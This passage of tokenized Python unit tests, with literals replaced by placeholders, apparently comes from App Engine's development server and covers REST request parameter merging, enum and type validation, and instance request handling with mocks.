'<STR_LIT>' , '<STR_LIT>' ) <EOL> new_request = self . server . transform_jsonrpc_request ( orig_request ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT:body>' } , <EOL> json . loads ( new_request . body ) ) <EOL> self . assertEqual ( '<STR_LIT>' , new_request . request_id ) <EOL> def _try_transform_rest_request ( self , path_parameters , query_parameters , <EOL> body_json , expected , method_params = None ) : <EOL> """<STR_LIT>""" <EOL> method_params = method_params or { } <EOL> test_request = test_utils . build_request ( '<STR_LIT>' ) <EOL> test_request . body_json = body_json <EOL> test_request . body = json . dumps ( body_json ) <EOL> test_request . parameters = query_parameters <EOL> transformed_request = self . server . transform_rest_request ( test_request , <EOL> path_parameters , <EOL> method_params ) <EOL> self . assertEqual ( expected , transformed_request . body_json ) <EOL> self . assertEqual ( transformed_request . body_json , <EOL> json . loads ( transformed_request . body ) ) <EOL> def test_transform_rest_request_path_only ( self ) : <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> query_parameters = { } <EOL> body_object = { } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_only_message_field ( self ) : <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> query_parameters = { } <EOL> body_object = { } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_only_enum ( self ) : <EOL> query_parameters = { } <EOL> body_object = { } <EOL> enum_descriptor = { '<STR_LIT:X>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> method_params = { '<STR_LIT>' : { '<STR_LIT>' : enum_descriptor } } <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:Y>' } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:Y>' } <EOL> try : <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except errors . EnumRejectionError as error : <EOL> self . assertEqual ( error . parameter_name , '<STR_LIT>' ) <EOL> def test_transform_rest_request_query_only ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:foo>' : [ '<STR_LIT:bar>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_only_message_field ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_only_multiple_values_not_repeated ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:foo>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT:foo>' : '<STR_LIT:bar>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_only_multiple_values_repeated ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:foo>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } <EOL> body_object = { } <EOL> method_params = { '<STR_LIT:foo>' : { '<STR_LIT>' : True } } <EOL> expected = { '<STR_LIT:foo>' : [ '<STR_LIT:bar>' , '<STR_LIT>' ] } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_transform_rest_request_query_only_enum ( self ) : <EOL> path_parameters = { } <EOL> body_object = { } <EOL> enum_descriptor = { '<STR_LIT:X>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> method_params = { '<STR_LIT>' : { '<STR_LIT>' : enum_descriptor } } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' ] } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:Y>' ] } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:Y>' } <EOL> try : <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except errors . EnumRejectionError as error : <EOL> self . assertEqual ( error . parameter_name , '<STR_LIT>' ) <EOL> def test_transform_rest_request_query_only_repeated_enum ( self ) : <EOL> path_parameters = { } <EOL> body_object = { } <EOL> enum_descriptor = { '<STR_LIT:X>' : { '<STR_LIT>' : '<STR_LIT:X>' } , '<STR_LIT:Y>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> method_params = { '<STR_LIT>' : { '<STR_LIT>' : enum_descriptor , '<STR_LIT>' : True } } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' , '<STR_LIT:Y>' ] } <EOL> expected = { '<STR_LIT>' : [ '<STR_LIT:X>' , '<STR_LIT:Y>' ] } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' , '<STR_LIT:Y>' , '<STR_LIT>' ] } <EOL> expected = { '<STR_LIT>' : [ '<STR_LIT:X>' , '<STR_LIT:Y>' , '<STR_LIT>' ] } <EOL> try : <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except errors . EnumRejectionError as error : <EOL> self . assertEqual ( error . parameter_name , '<STR_LIT>' ) <EOL> def test_transform_rest_request_body_only ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT>' : '<STR_LIT:body>' } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:body>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_body_only_any_old_value ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT:body>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT:body>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_body_only_message_field ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_body_only_enum ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { } <EOL> enum_descriptor = { '<STR_LIT:X>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> method_params = { '<STR_LIT>' : { '<STR_LIT>' : enum_descriptor } } <EOL> body_object = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> body_object = { '<STR_LIT>' : '<STR_LIT:Y>' } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:Y>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_transform_rest_request_path_query_no_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:c>' : [ '<STR_LIT:d>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:b>' , '<STR_LIT:c>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_query_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_query_collision_in_repeated_param ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:d>' , '<STR_LIT:c>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT:a>' : [ '<STR_LIT:d>' , '<STR_LIT:c>' , '<STR_LIT:b>' ] } <EOL> method_params = { '<STR_LIT:a>' : { '<STR_LIT>' : True } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_transform_rest_request_path_body_no_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT:c>' : '<STR_LIT:d>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:b>' , '<STR_LIT:c>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_body_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT:a>' : '<STR_LIT:d>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_body_collision_in_repeated_param ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> expected = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> method_params = { '<STR_LIT:a>' : { '<STR_LIT>' : True } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_transform_rest_request_path_body_message_field_cooperative ( self ) : <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' , '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_body_message_field_collision ( self ) : <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_body_no_collision ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:b>' ] } <EOL> body_object = { '<STR_LIT:c>' : '<STR_LIT:d>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:b>' , '<STR_LIT:c>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_body_collision ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:b>' ] } <EOL> body_object = { '<STR_LIT:a>' : '<STR_LIT:d>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_body_collision_in_repeated_param ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:b>' ] } <EOL> body_object = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> expected = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> method_params = { '<STR_LIT:a>' : { '<STR_LIT>' : True } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_transform_rest_request_query_body_message_field_cooperative ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' ] } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' , '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_body_message_field_collision ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' ] } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_query_body_no_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:c>' : [ '<STR_LIT:d>' ] } <EOL> body_object = { '<STR_LIT:e>' : '<STR_LIT:f>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:b>' , '<STR_LIT:c>' : '<STR_LIT:d>' , '<STR_LIT:e>' : '<STR_LIT:f>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_query_body_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> body_object = { '<STR_LIT:a>' : '<STR_LIT:f>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:f>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_unknown_parameters ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:c>' : [ '<STR_LIT:d>' ] } <EOL> body_object = { '<STR_LIT:e>' : '<STR_LIT:f>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:b>' , '<STR_LIT:c>' : '<STR_LIT:d>' , '<STR_LIT:e>' : '<STR_LIT:f>' } <EOL> method_params = { '<STR_LIT:X>' : { } , '<STR_LIT:Y>' : { } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_type_conversions ( self ) : <EOL> """<STR_LIT>""" <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> body_object = { '<STR_LIT>' : '<STR_LIT>' } <EOL> expected = { '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> method_params = { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT:float>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , method_params ) <EOL> def test_invalid_conversions ( self ) : <EOL> """<STR_LIT>""" <EOL> for type_name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:float>' , '<STR_LIT>' ) : <EOL> param_name = '<STR_LIT>' % type_name <EOL> path_parameters = { param_name : '<STR_LIT>' } <EOL> query_parameters = { } <EOL> body_object = { } <EOL> expected = { } <EOL> method_params = { param_name : { '<STR_LIT:type>' : type_name } } <EOL> try : <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> self . fail ( '<STR_LIT>' % type_name ) <EOL> except errors . BasicTypeParameterError as error : <EOL> self . assertEqual ( error . parameter_name , param_name ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> import unittest <EOL> import google <EOL> import mox <EOL> from google . appengine . tools . devappserver2 import instance <EOL> from google . appengine . tools . devappserver2 import wsgi_request_info <EOL> class TestInstance ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . mox = mox . Mox ( ) <EOL> self . proxy = self . mox . CreateMock ( instance . RuntimeProxy ) <EOL> self . environ = object ( ) <EOL> self . start_response = object ( ) <EOL> self . url_map = object ( ) <EOL> self . match = object ( ) <EOL> self . request_id = object ( ) <EOL> self . response = [ object ( ) ] <EOL> self . request_data = self . mox . CreateMock ( wsgi_request_info . WSGIRequestInfo ) <EOL> def tearDown ( self ) : <EOL> self . mox . UnsetStubs ( ) <EOL> def test_new_instance ( self ) : <EOL> inst = instance . Instance ( <EOL> self . request_data , '<STR_LIT:name>' , self . proxy , max_concurrent_requests = <NUM_LIT:5> , <EOL> expect_ready_request = True ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:5> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . num_outstanding_requests ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> self . assertTrue ( inst . handling_ready_request ) <EOL> self . assertAlmostEqual ( <NUM_LIT:0> , inst . idle_seconds , places = <NUM_LIT:2> ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . get_latency_60s ( ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . get_qps_60s ( ) ) <EOL> self . assertEqual ( '<STR_LIT:name>' , inst . instance_id ) <EOL> def test_handle ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . environ = { } <EOL> self . request_data . set_request_instance ( self . request_id , inst ) <EOL> self . proxy . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) . AndReturn ( self . response ) <EOL> inst . _condition . notify ( ) <EOL> self . mox . ReplayAll ( ) <EOL> now = time . time ( ) <EOL> inst . _request_history . append ( ( now - <NUM_LIT:100> , now - <NUM_LIT> ) ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> self . assertEqual ( <EOL> self . response , <EOL> list ( inst . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) ) ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( inst . _request_history ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:5> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . num_outstanding_requests ) <EOL> self . assertTrue ( <NUM_LIT:0> < inst . get_qps_60s ( ) ) <EOL> def test_handle_ready_request ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> expect_ready_request = True ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . environ = { } <EOL> self . request_data . set_request_instance ( self . request_id , inst ) <EOL> self . proxy . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . READY_REQUEST ) . AndReturn ( self . response ) <EOL> inst . _condition . notify ( <NUM_LIT:5> ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . handle , <EOL> self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) <EOL> self . assertEqual ( <EOL> self . response , <EOL> list ( inst . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . READY_REQUEST ) ) ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:5> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . num_outstanding_requests ) <EOL> self . assertTrue ( <NUM_LIT:0> < inst . get_qps_60s ( ) ) <EOL> self . assertFalse ( inst . handling_ready_request ) <EOL> def test_handle_background_request ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:2> ) <EOL> inst . _num_running_background_threads = <NUM_LIT:1> <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . environ = { } <EOL> self . request_data . set_request_instance ( self . request_id , inst ) <EOL> self . proxy . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . BACKGROUND_REQUEST ) . AndReturn ( self . response ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> self . assertEqual ( <EOL> self . response , <EOL> list ( inst . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . BACKGROUND_REQUEST ) ) ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:5> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . num_outstanding_requests ) <EOL> self . assertTrue ( <NUM_LIT:0> < inst . get_qps_60s ( ) ) <EOL> self . assertEqual ( <NUM_LIT:2> , inst . remaining_background_thread_capacity ) <EOL> self . assertFalse ( inst . handling_ready_request ) <EOL> def test_handle_shutdown_request ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:0> <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . environ = { } <EOL> self . request_data . set_request_instance ( self . request_id , inst ) <EOL> self . proxy . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . SHUTDOWN_REQUEST ) . AndReturn ( self . response ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> self . assertFalse ( inst . has_quit ) <EOL> inst . quit ( expect_shutdown = True ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> self . assertTrue ( inst . has_quit ) <EOL> self . assertEqual ( <EOL> self . response , <EOL> list ( inst . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . SHUTDOWN_REQUEST ) ) ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . num_outstanding_requests ) <EOL> self . assertTrue ( <NUM_LIT:0> < inst . get_qps_60s ( ) ) <EOL> self . assertFalse ( inst . _quitting ) <EOL> self . assertTrue ( inst . _quit ) <EOL> def test_handle_shutdown_request_running_request ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . environ = { } <EOL> self . request_data . set_request_instance ( self . request_id , inst ) <EOL> self . proxy . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . SHUTDOWN_REQUEST ) . AndReturn ( self . response ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> self . assertFalse ( inst . has_quit ) <EOL> inst . quit ( expect_shutdown = True ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> self . assertTrue ( inst . has_quit ) <EOL> self . assertEqual ( <EOL> self . response , <EOL> list ( inst . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . SHUTDOWN_REQUEST ) ) ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . num_outstanding_requests ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . idle_seconds ) <EOL> self . assertTrue ( <NUM_LIT:0> < inst . get_qps_60s ( ) ) <EOL> self . assertTrue ( inst . _quitting ) <EOL> self . assertFalse ( inst . _quit ) <EOL> def test_handle_before_start ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . handle , <EOL> self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) <EOL> def test_handle_after_quit ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . handle , <EOL> self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_handle_while_quitting ( self ) : <EOL> inst = instance . Instance ( self . request_data , 